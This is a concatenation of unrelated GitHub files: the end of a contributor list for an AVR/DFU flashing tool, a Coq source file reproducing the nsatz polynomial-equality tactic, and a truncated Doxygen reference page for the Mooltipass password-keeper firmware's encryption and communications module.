   - patch to enable atmega8u2
 - Martin Guy
   - patch to enable automotive AVR32 flashing without a timeout
 - Walker Inman
   - bugfix flash user page for avr32
   - add stm32 devices
   - add progress bar
   - update algorithm for converting hex and sending program
   - simplify command structure
   - add ability to dump to hex file (and hex2bin / bin2hex)
   - svn -> git migration
   - update --help -h text
   - also a lot of formatting updates (sorry)
   - More info in README
   - Add autocomplete for Ubuntu
 - Simon Large
   - fix atmel_reset function
   - get rid of compiler warnings around fprintf statements
   - fix build system for selecting libusb-1.0
   - atmega16u2 support
   - better support for Windows users
   - improve layout of help text
   - add security fuse support for AVR32
   - fix memory bounds for xmega devices
 - Johannes Carlsson
   - patch to fix use of libusb in configure.ac
 - Grégory S.
   - identified too-late check for null pointer
 - Dmitry Nedospasov
   - support for xmega devices
 - Kees Bakker
   - support for atxmega256a3bu
 - David Nelson
   - support for at32uc3a4256s
   - support for using a specific usb bus/address
   - support for device serialisation
   - correction to --quiet output
 - Olivier Pisano
   - support for atxmega16c4
 - Neels Hofmeyr
   - improvements to progress bar
 - John Szakmeister
   - Fix exit status of help-related options and improve start sequence
 - Alban Bedel
   - Fix infinite loop using rpl_malloc
{ "pile_set_name": "Github" }
(** This is a copy of the parts of the Coq stdlib implementing [nsatz], excluding the bit that adds support for [ℝ], which draws in axioms reported by coqchk. Once we move to Coq 8.13 as our minimum version, this should be dropped. *) (************************************************************************) (* * The Coq Proof Assistant / The Coq Development Team *) (* v * Copyright INRIA, CNRS and contributors *) (* <O___,, * (see version control and CREDITS file for authors & dates) *) (* \VV/ **************************************************************) (* // * This file is distributed under the terms of the *) (* * GNU Lesser General Public License Version 2.1 *) (* * (see LICENSE file for the text of the license) *) (************************************************************************) (* Tactic nsatz: proofs of polynomials equalities in an integral domain (commutative ring without zero divisor). Examples: see test-suite/success/Nsatz.v Reification is done using type classes, defined in Ncring_tac.v *) From Coq Require Import List. From Coq Require Import Setoid. From Coq Require Import BinPos. From Coq Require Import BinList. From Coq Require Import Znumtheory. From Coq Require Export Morphisms Setoid Bool. From Coq Require Export Algebra_syntax. From Coq Require Export Ncring. From Coq Require Export Ncring_initial. From Coq Require Export Ncring_tac. From Coq Require Export Integral_domain. From Coq Require Import ZArith. From Coq Require Import Lia. Declare ML Module "nsatz_plugin". Section nsatz1. Context {R:Type}`{Rid:Integral_domain R}. Lemma psos_r1b: forall x y:R, x - y == 0 -> x == y. intros x y H; setoid_replace x with ((x - y) + y); simpl; [setoid_rewrite H | idtac]; simpl. cring. cring. Qed. Lemma psos_r1: forall x y, x == y -> x - y == 0. intros x y H; simpl; setoid_rewrite H; simpl; cring. Qed. Lemma nsatzR_diff: forall x y:R, not (x == y) -> not (x - y == 0). intros. intro; apply H. simpl; setoid_replace x with ((x - y) + y). simpl. setoid_rewrite H0. simpl; cring. simpl. simpl; cring. Qed. (* adpatation du code de Benjamin aux setoides *) Export Ring_polynom. Export InitialRing. Definition PolZ := Pol Z. Definition PEZ := PExpr Z. Definition P0Z : PolZ := P0 (C:=Z) 0%Z. Definition PolZadd : PolZ -> PolZ -> PolZ := @Padd Z 0%Z Z.add Zeq_bool. Definition PolZmul : PolZ -> PolZ -> PolZ := @Pmul Z 0%Z 1%Z Z.add Z.mul Zeq_bool. Definition PolZeq := @Peq Z Zeq_bool. Definition norm := @norm_aux Z 0%Z 1%Z Z.add Z.mul Z.sub Z.opp Zeq_bool. Fixpoint mult_l (la : list PEZ) (lp: list PolZ) : PolZ := match la, lp with | a::la, p::lp => PolZadd (PolZmul (norm a) p) (mult_l la lp) | _, _ => P0Z end. Fixpoint compute_list (lla: list (list PEZ)) (lp:list PolZ) := match lla with | List.nil => lp | la::lla => compute_list lla ((mult_l la lp)::lp) end. Definition check (lpe:list PEZ) (qe:PEZ) (certif: list (list PEZ) * list PEZ) := let (lla, lq) := certif in let lp := List.map norm lpe in PolZeq (norm qe) (mult_l lq (compute_list lla lp)). (* Correction *) Definition PhiR : list R -> PolZ -> R := (Pphi ring0 add mul (InitialRing.gen_phiZ ring0 ring1 add mul opp)). Definition PEevalR : list R -> PEZ -> R := PEeval ring0 ring1 add mul sub opp (gen_phiZ ring0 ring1 add mul opp) N.to_nat pow. Lemma P0Z_correct : forall l, PhiR l P0Z = 0. Proof. trivial. Qed. Lemma Rext: ring_eq_ext add mul opp _==_. Proof. constructor; solve_proper. Qed. Lemma Rset : Setoid_Theory R _==_. apply ring_setoid. Qed. Definition Rtheory:ring_theory ring0 ring1 add mul sub opp _==_. apply mk_rt. 
apply ring_add_0_l. apply ring_add_comm. apply ring_add_assoc. apply ring_mul_1_l. apply cring_mul_comm. apply ring_mul_assoc. apply ring_distr_l. apply ring_sub_def. apply ring_opp_def. Defined. Lemma PolZadd_correct : forall P' P l, PhiR l (PolZadd P P') == ((PhiR l P) + (PhiR l P')). Proof. unfold PolZadd, PhiR. intros. simpl. refine (Padd_ok Rset Rext (Rth_ARth Rset Rext Rtheory) (gen_phiZ_morph Rset Rext Rtheory) _ _ _). Qed. Lemma PolZmul_correct : forall P P' l, PhiR l (PolZmul P P') == ((PhiR l P) * (PhiR l P')). Proof. unfold PolZmul, PhiR. intros. refine (Pmul_ok Rset Rext (Rth_ARth Rset Rext Rtheory) (gen_phiZ_morph Rset Rext Rtheory) _ _ _). Qed. Lemma R_power_theory : Ring_theory.power_theory ring1 mul _==_ N.to_nat pow. apply Ring_theory.mkpow_th. unfold pow. intros. rewrite Nnat.N2Nat.id. reflexivity. Qed. Lemma norm_correct : forall (l : list R) (pe : PEZ), PEevalR l pe == PhiR l (norm pe). Proof. intros;apply (norm_aux_spec Rset Rext (Rth_ARth Rset Rext Rtheory) (gen_phiZ_morph Rset Rext Rtheory) R_power_theory). Qed. Lemma PolZeq_correct : forall P P' l, PolZeq P P' = true -> PhiR l P == PhiR l P'. Proof. intros;apply (Peq_ok Rset Rext (gen_phiZ_morph Rset Rext Rtheory));trivial. Qed. Fixpoint Cond0 (A:Type) (Interp:A->R) (l:list A) : Prop := match l with | List.nil => True | a::l => Interp a == 0 /\ Cond0 A Interp l end. Lemma mult_l_correct : forall l la lp, Cond0 PolZ (PhiR l) lp -> PhiR l (mult_l la lp) == 0. Proof. induction la;simpl;intros. cring. destruct lp;trivial. simpl. cring. simpl in H;destruct H. rewrite PolZadd_correct. simpl. rewrite PolZmul_correct. simpl. rewrite H. rewrite IHla. cring. trivial. Qed. Lemma compute_list_correct : forall l lla lp, Cond0 PolZ (PhiR l) lp -> Cond0 PolZ (PhiR l) (compute_list lla lp). Proof. induction lla;simpl;intros;trivial. apply IHlla;simpl;split;trivial. apply mult_l_correct;trivial. Qed. Lemma check_correct : forall l lpe qe certif, check lpe qe certif = true -> Cond0 PEZ (PEevalR l) lpe -> PEevalR l qe == 0. Proof. unfold check;intros l lpe qe (lla, lq) H2 H1. apply PolZeq_correct with (l:=l) in H2. rewrite norm_correct, H2. apply mult_l_correct. apply compute_list_correct. clear H2 lq lla qe;induction lpe;simpl;trivial. simpl in H1;destruct H1. rewrite <- norm_correct;auto. Qed. (* fin *) Definition R2:= 1 + 1. Fixpoint IPR p {struct p}: R := match p with xH => ring1 | xO xH => 1+1 | xO p1 => R2*(IPR p1) | xI xH => 1+(1+1) | xI p1 => 1+(R2*(IPR p1)) end. Definition IZR1 z := match z with Z0 => 0 | Zpos p => IPR p | Zneg p => -(IPR p) end. Fixpoint interpret3 t fv {struct t}: R := match t with | (PEadd t1 t2) => let v1 := interpret3 t1 fv in let v2 := interpret3 t2 fv in (v1 + v2) | (PEmul t1 t2) => let v1 := interpret3 t1 fv in let v2 := interpret3 t2 fv in (v1 * v2) | (PEsub t1 t2) => let v1 := interpret3 t1 fv in let v2 := interpret3 t2 fv in (v1 - v2) | (PEopp t1) => let v1 := interpret3 t1 fv in (-v1) | (PEpow t1 t2) => let v1 := interpret3 t1 fv in pow v1 (N.to_nat t2) | (PEc t1) => (IZR1 t1) | PEO => 0 | PEI => 1 | (PEX _ n) => List.nth (pred (Pos.to_nat n)) fv 0 end. End nsatz1. Ltac equality_to_goal H x y:= (* eliminate trivial hypotheses, but it takes time!: let h := fresh "nH" in (assert (h:equality x y); [solve [cring] | clear H; clear h]) || *) try (generalize (@psos_r1 _ _ _ _ _ _ _ _ _ _ _ x y H); clear H) . 
Ltac equalities_to_goal := lazymatch goal with | H: (_ ?x ?y) |- _ => equality_to_goal H x y | H: (_ _ ?x ?y) |- _ => equality_to_goal H x y | H: (_ _ _ ?x ?y) |- _ => equality_to_goal H x y | H: (_ _ _ _ ?x ?y) |- _ => equality_to_goal H x y (* extension possible :-) *) | H: (?x == ?y) |- _ => equality_to_goal H x y end. (* lp est incluse dans fv. La met en tete. *) Ltac parametres_en_tete fv lp := match fv with | (@nil _) => lp | (@cons _ ?x ?fv1) => let res := AddFvTail x lp in parametres_en_tete fv1 res end. Ltac append1 a l := match l with | (@nil _) => constr:(cons a l) | (cons ?x ?l) => let l' := append1 a l in constr:(cons x l') end. Ltac rev l := match l with |(@nil _) => l | (cons ?x ?l) => let l' := rev l in append1 x l' end. Ltac nsatz_call_n info nparam p rr lp kont := (* idtac "Trying power: " rr;*) let ll := constr:(PEc info :: PEc nparam :: PEpow p rr :: lp) in (* idtac "calcul...";*) nsatz_compute ll; (* idtac "done";*) match goal with | |- (?c::PEpow _ ?r::?lq0)::?lci0 = _ -> _ => intros _; let lci := fresh "lci" in set (lci:=lci0); let lq := fresh "lq" in set (lq:=lq0); kont c rr lq lci end. Ltac nsatz_call radicalmax info nparam p lp kont := let rec try_n n := lazymatch n with | 0%N => fail | _ => (let r := eval compute in (N.sub radicalmax (N.pred n)) in nsatz_call_n info nparam p r lp kont) || let n' := eval compute in (N.pred n) in try_n n' end in try_n radicalmax. Ltac lterm_goal g := match g with ?b1 == ?b2 => constr:(b1::b2::nil) | ?b1 == ?b2 -> ?g => let l := lterm_goal g in constr:(b1::b2::l) end. Ltac reify_goal l le lb:= match le with nil => idtac | ?e::?le1 => match lb with ?b::?lb1 => (* idtac "b="; idtac b;*) let x := fresh "B" in set (x:= b) at 1; change x with (interpret3 e l); clear x; reify_goal l le1 lb1 end end. Ltac get_lpol g := match g with (interpret3 ?p _) == _ => constr:(p::nil) | (interpret3 ?p _) == _ -> ?g => let l := get_lpol g in constr:(p::l) end. (** We only make use of [discrR] if [nsatz] support for reals is loaded. To do this, we redefine this tactic in Nsatz.v to make use of real discrimination. *) Ltac nsatz_internal_discrR := idtac. 
Ltac nsatz_generic radicalmax info lparam lvar := let nparam := eval compute in (Z.of_nat (List.length lparam)) in match goal with |- ?g => let lb := lterm_goal g in match (match lvar with |(@nil _) => match lparam with |(@nil _) => let r := eval red in (list_reifyl (lterm:=lb)) in r |_ => match eval red in (list_reifyl (lterm:=lb)) with |(?fv, ?le) => let fv := parametres_en_tete fv lparam in (* we reify a second time, with the good order for variables *) let r := eval red in (list_reifyl (lterm:=lb) (lvar:=fv)) in r end end |_ => let fv := parametres_en_tete lvar lparam in let r := eval red in (list_reifyl (lterm:=lb) (lvar:=fv)) in r end) with |(?fv, ?le) => reify_goal fv le lb ; match goal with |- ?g => let lp := get_lpol g in let lpol := eval compute in (List.rev lp) in intros; let SplitPolyList kont := match lpol with | ?p2::?lp2 => kont p2 lp2 | _ => idtac "polynomial not in the ideal" end in SplitPolyList ltac:(fun p lp => let p21 := fresh "p21" in let lp21 := fresh "lp21" in set (p21:=p) ; set (lp21:=lp); (* idtac "nparam:"; idtac nparam; idtac "p:"; idtac p; idtac "lp:"; idtac lp; *) nsatz_call radicalmax info nparam p lp ltac:(fun c r lq lci => let q := fresh "q" in set (q := PEmul c (PEpow p21 r)); let Hg := fresh "Hg" in assert (Hg:check lp21 q (lci,lq) = true); [ (vm_compute;reflexivity) || idtac "invalid nsatz certificate" | let Hg2 := fresh "Hg" in assert (Hg2: (interpret3 q fv) == 0); [ (*simpl*) idtac; generalize (@check_correct _ _ _ _ _ _ _ _ _ _ _ fv lp21 q (lci,lq) Hg); let cc := fresh "H" in (*simpl*) idtac; intro cc; apply cc; clear cc; (*simpl*) idtac; repeat (split;[assumption|idtac]); exact I | (*simpl in Hg2;*) (*simpl*) idtac; apply Rintegral_domain_pow with (interpret3 c fv) (N.to_nat r); (*simpl*) idtac; try apply integral_domain_one_zero; try apply integral_domain_minus_one_zero; try trivial; try exact integral_domain_one_zero; try exact integral_domain_minus_one_zero || (solve [simpl; unfold R2, equality, eq_notation, addition, add_notation, one, one_notation, multiplication, mul_notation, zero, zero_notation; nsatz_internal_discrR || lia ]) || ((*simpl*) idtac) || idtac "could not prove discrimination result" ] ] ) ) end end end . Ltac nsatz_default:= intros; try apply (@psos_r1b _ _ _ _ _ _ _ _ _ _ _); match goal with |- (@equality ?r _ _ _) => repeat equalities_to_goal; nsatz_generic 6%N 1%Z (@nil r) (@nil r) end. Tactic Notation "nsatz" := nsatz_default. Tactic Notation "nsatz" "with" "radicalmax" ":=" constr(radicalmax) "strategy" ":=" constr(info) "parameters" ":=" constr(lparam) "variables" ":=" constr(lvar):= intros; try apply (@psos_r1b _ _ _ _ _ _ _ _ _ _ _); match goal with |- (@equality ?r _ _ _) => repeat equalities_to_goal; nsatz_generic radicalmax info lparam lvar end. (* Rational numbers *) From Coq Require Import QArith. Instance Qops: (@Ring_ops Q 0%Q 1%Q Qplus Qmult Qminus Qopp Qeq) := { }. Instance Qri : (Ring (Ro:=Qops)). constructor. try apply Q_Setoid. apply Qplus_comp. apply Qmult_comp. apply Qminus_comp. apply Qopp_comp. exact Qplus_0_l. exact Qplus_comm. apply Qplus_assoc. exact Qmult_1_l. exact Qmult_1_r. apply Qmult_assoc. apply Qmult_plus_distr_l. intros. apply Qmult_plus_distr_r. reflexivity. exact Qplus_opp_r. Defined. Lemma Q_one_zero: not (Qeq 1%Q 0%Q). Proof. unfold Qeq. simpl. lia. Qed. Instance Qcri: (Cring (Rr:=Qri)). red. exact Qmult_comm. Defined. Instance Qdi : (Integral_domain (Rcr:=Qcri)). constructor. exact Qmult_integral. exact Q_one_zero. Defined. (* Integers *) Lemma Z_one_zero: 1%Z <> 0%Z. Proof. lia. Qed. 
Instance Zcri: (Cring (Rr:=Zr)). red. exact Z.mul_comm. Defined. Instance Zdi : (Integral_domain (Rcr:=Zcri)). constructor. exact Zmult_integral. exact Z_one_zero. Defined.
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.11"/> <title>Mooltipass: src/LOGIC/logic_aes_and_comms.c File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { init_search(); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectlogo"><img alt="Logo" src="0_Mooltipass.png"/></td> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">Mooltipass </div> <div id="projectbrief">Offline Password Keeper</div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.11 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="annotated.html"><span>Data&#160;Structures</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>Globals</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li><li class="navelem"><a class="el" href="dir_1e282d0b243de6680512bf201346d37b.html">LOGIC</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#func-members">Functions</a> &#124; <a href="#var-members">Variables</a> </div> <div 
class="headertitle"> <div class="title">logic_aes_and_comms.c File Reference</div> </div> </div><!--header--> <div class="contents"> <p>Firmware logic - encryption and communications Created: 18/08/2014 Author: Mathieu Stephan. <a href="#details">More...</a></p> <div class="textblock"><code>#include &lt;util/atomic.h&gt;</code><br /> <code>#include &lt;string.h&gt;</code><br /> <code>#include &quot;<a class="el" href="gui__credentials__functions_8h_source.html">gui_credentials_functions.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="logic__fwflash__storage_8h_source.html">logic_fwflash_storage.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="gui__screen__functions_8h_source.html">gui_screen_functions.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="logic__aes__and__comms_8h_source.html">logic_aes_and_comms.h</a>&quot;</code><br /> <code>#include &quot;usb_cmd_parser.h&quot;</code><br /> <code>#include &quot;<a class="el" href="timer__manager_8h_source.html">timer_manager.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="logic__eeprom_8h_source.html">logic_eeprom.h</a>&quot;</code><br /> <code>#include &quot;hid_defines.h&quot;</code><br /> <code>#include &quot;<a class="el" href="aes256__ctr_8h_source.html">aes256_ctr.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="node__mgmt_8h_source.html">node_mgmt.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="flash__mem_8h_source.html">flash_mem.h</a>&quot;</code><br /> <code>#include &quot;defines.h&quot;</code><br /> <code>#include &quot;<a class="el" href="delays_8h_source.html">delays.h</a>&quot;</code><br /> <code>#include &quot;usb.h&quot;</code><br /> <code>#include &quot;rng.h&quot;</code><br /> </div><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="func-members"></a> Functions</h2></td></tr> <tr class="memitem:af605926c53e38170c91ca278dd84ae66"><td class="memItemLeft" align="right" valign="top">uint8_t&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#af605926c53e38170c91ca278dd84ae66">getSmartCardInsertedUnlocked</a> (void)</td></tr> <tr class="memdesc:af605926c53e38170c91ca278dd84ae66"><td class="mdescLeft">&#160;</td><td class="mdescRight">know if the smartcard is inserted and unlocked <a href="#af605926c53e38170c91ca278dd84ae66">More...</a><br /></td></tr> <tr class="separator:af605926c53e38170c91ca278dd84ae66"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aa23fbe207819d840f0a42b9da5ce1112"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa23fbe207819d840f0a42b9da5ce1112"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#aa23fbe207819d840f0a42b9da5ce1112">setSmartCardInsertedUnlocked</a> (void)</td></tr> <tr class="memdesc:aa23fbe207819d840f0a42b9da5ce1112"><td class="mdescLeft">&#160;</td><td class="mdescRight">set the smartcard is inserted and unlocked <br /></td></tr> <tr class="separator:aa23fbe207819d840f0a42b9da5ce1112"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a3e693658d71a156f5c87c89f47962050"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3e693658d71a156f5c87c89f47962050"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a3e693658d71a156f5c87c89f47962050">clearSmartCardInsertedUnlocked</a> 
(void)</td></tr> <tr class="memdesc:a3e693658d71a156f5c87c89f47962050"><td class="mdescLeft">&#160;</td><td class="mdescRight">set the smartcard is removed (called by interrupt!) <br /></td></tr> <tr class="separator:a3e693658d71a156f5c87c89f47962050"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ad4185a8a95564978161535d5ca311cd2"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad4185a8a95564978161535d5ca311cd2"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#ad4185a8a95564978161535d5ca311cd2">eraseFlashUsersContents</a> (void)</td></tr> <tr class="memdesc:ad4185a8a95564978161535d5ca311cd2"><td class="mdescLeft">&#160;</td><td class="mdescRight">Erase everything inside the flash. <br /></td></tr> <tr class="separator:ad4185a8a95564978161535d5ca311cd2"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a9cc73786e07d95f0a8eb1027c8b12f8b"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a9cc73786e07d95f0a8eb1027c8b12f8b">initEncryptionHandling</a> (uint8_t *aes_key, uint8_t *nonce)</td></tr> <tr class="memdesc:a9cc73786e07d95f0a8eb1027c8b12f8b"><td class="mdescLeft">&#160;</td><td class="mdescRight">Initialize our encryption/decryption part. <a href="#a9cc73786e07d95f0a8eb1027c8b12f8b">More...</a><br /></td></tr> <tr class="separator:a9cc73786e07d95f0a8eb1027c8b12f8b"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:adfa8333245b42cbc18827c77b09fbabe"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#adfa8333245b42cbc18827c77b09fbabe">initUserFlashContext</a> (uint8_t user_id)</td></tr> <tr class="memdesc:adfa8333245b42cbc18827c77b09fbabe"><td class="mdescLeft">&#160;</td><td class="mdescRight">Initialize our flash context. 
<a href="#adfa8333245b42cbc18827c77b09fbabe">More...</a><br /></td></tr> <tr class="separator:adfa8333245b42cbc18827c77b09fbabe"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a36e48576e34a7d177f2e4d26ab754e69"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a36e48576e34a7d177f2e4d26ab754e69"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>searchForServiceName</b> (uint8_t *name, uint8_t mode, uint8_t type)</td></tr> <tr class="separator:a36e48576e34a7d177f2e4d26ab754e69"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ab745dd39d25124d24f134c82a7f92884"><td class="memItemLeft" align="right" valign="top">uint16_t&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#ab745dd39d25124d24f134c82a7f92884">searchForLoginInGivenParent</a> (uint16_t parent_addr, uint8_t *name)</td></tr> <tr class="separator:ab745dd39d25124d24f134c82a7f92884"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a35709638dca7acadeec3391a0e79cbcd"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a35709638dca7acadeec3391a0e79cbcd"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a35709638dca7acadeec3391a0e79cbcd">ctrPreEncryptionTasks</a> (void)</td></tr> <tr class="memdesc:a35709638dca7acadeec3391a0e79cbcd"><td class="mdescLeft">&#160;</td><td class="mdescRight">CTR pre encryption tasks. <br /></td></tr> <tr class="separator:a35709638dca7acadeec3391a0e79cbcd"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a853f383eaf0065dfbdb3dbcfb3eca04b"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a853f383eaf0065dfbdb3dbcfb3eca04b">decrypt32bBlockOfDataAndClearCTVFlag</a> (uint8_t *data, uint8_t *ctr)</td></tr> <tr class="memdesc:a853f383eaf0065dfbdb3dbcfb3eca04b"><td class="mdescLeft">&#160;</td><td class="mdescRight">Decrypt a block of data, clear credential_timer_valid. <a href="#a853f383eaf0065dfbdb3dbcfb3eca04b">More...</a><br /></td></tr> <tr class="separator:a853f383eaf0065dfbdb3dbcfb3eca04b"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:abe78ac5d68297cef1ed356c0741840ab"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#abe78ac5d68297cef1ed356c0741840ab">encrypt32bBlockOfDataAndClearCTVFlag</a> (uint8_t *data, uint8_t *ctr)</td></tr> <tr class="memdesc:abe78ac5d68297cef1ed356c0741840ab"><td class="mdescLeft">&#160;</td><td class="mdescRight">Encrypt a block of data, clear credential_timer_valid. <a href="#abe78ac5d68297cef1ed356c0741840ab">More...</a><br /></td></tr> <tr class="separator:abe78ac5d68297cef1ed356c0741840ab"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ac858e3c344d7f63ca46362e88708c41e"><td class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#ac858e3c344d7f63ca46362e88708c41e">setCurrentContext</a> (uint8_t *name, uint8_t type)</td></tr> <tr class="memdesc:ac858e3c344d7f63ca46362e88708c41e"><td class="mdescLeft">&#160;</td><td class="mdescRight">Set our current context. 
<a href="#ac858e3c344d7f63ca46362e88708c41e">More...</a><br /></td></tr> <tr class="separator:ac858e3c344d7f63ca46362e88708c41e"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ae22526bcee06cd313f9a3e126e86fcb7"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae22526bcee06cd313f9a3e126e86fcb7"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>addNewContext</b> (uint8_t *name, uint8_t length, uint8_t type)</td></tr> <tr class="separator:ae22526bcee06cd313f9a3e126e86fcb7"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a4b874d6b7f6e9eec80b191030da5fa6c"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4b874d6b7f6e9eec80b191030da5fa6c"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>getLoginForContext</b> (char *buffer)</td></tr> <tr class="separator:a4b874d6b7f6e9eec80b191030da5fa6c"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a9097014a9a6278dd02ff4448cd2dfc94"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a9097014a9a6278dd02ff4448cd2dfc94"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>getPasswordForContext</b> (char *buffer)</td></tr> <tr class="separator:a9097014a9a6278dd02ff4448cd2dfc94"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a3c22892bb4d89ede68299edd4755858a"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3c22892bb4d89ede68299edd4755858a"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>getDescriptionForContext</b> (char *buffer)</td></tr> <tr class="separator:a3c22892bb4d89ede68299edd4755858a"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a9c7c9fab57070ffc66fa6fcb64c0f6e0"><td class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a9c7c9fab57070ffc66fa6fcb64c0f6e0">setLoginForContext</a> (uint8_t *name, uint8_t length)</td></tr> <tr class="memdesc:a9c7c9fab57070ffc66fa6fcb64c0f6e0"><td class="mdescLeft">&#160;</td><td class="mdescRight">Set login for current context. <a href="#a9c7c9fab57070ffc66fa6fcb64c0f6e0">More...</a><br /></td></tr> <tr class="separator:a9c7c9fab57070ffc66fa6fcb64c0f6e0"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a13c7de9328d80459f78fa702bb0bd230"><td class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a13c7de9328d80459f78fa702bb0bd230">setPasswordForContext</a> (uint8_t *password, uint8_t length)</td></tr> <tr class="memdesc:a13c7de9328d80459f78fa702bb0bd230"><td class="mdescLeft">&#160;</td><td class="mdescRight">Set password for current context. <a href="#a13c7de9328d80459f78fa702bb0bd230">More...</a><br /></td></tr> <tr class="separator:a13c7de9328d80459f78fa702bb0bd230"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:acba821e3c7d55c66ac7672fe3776edbf"><td 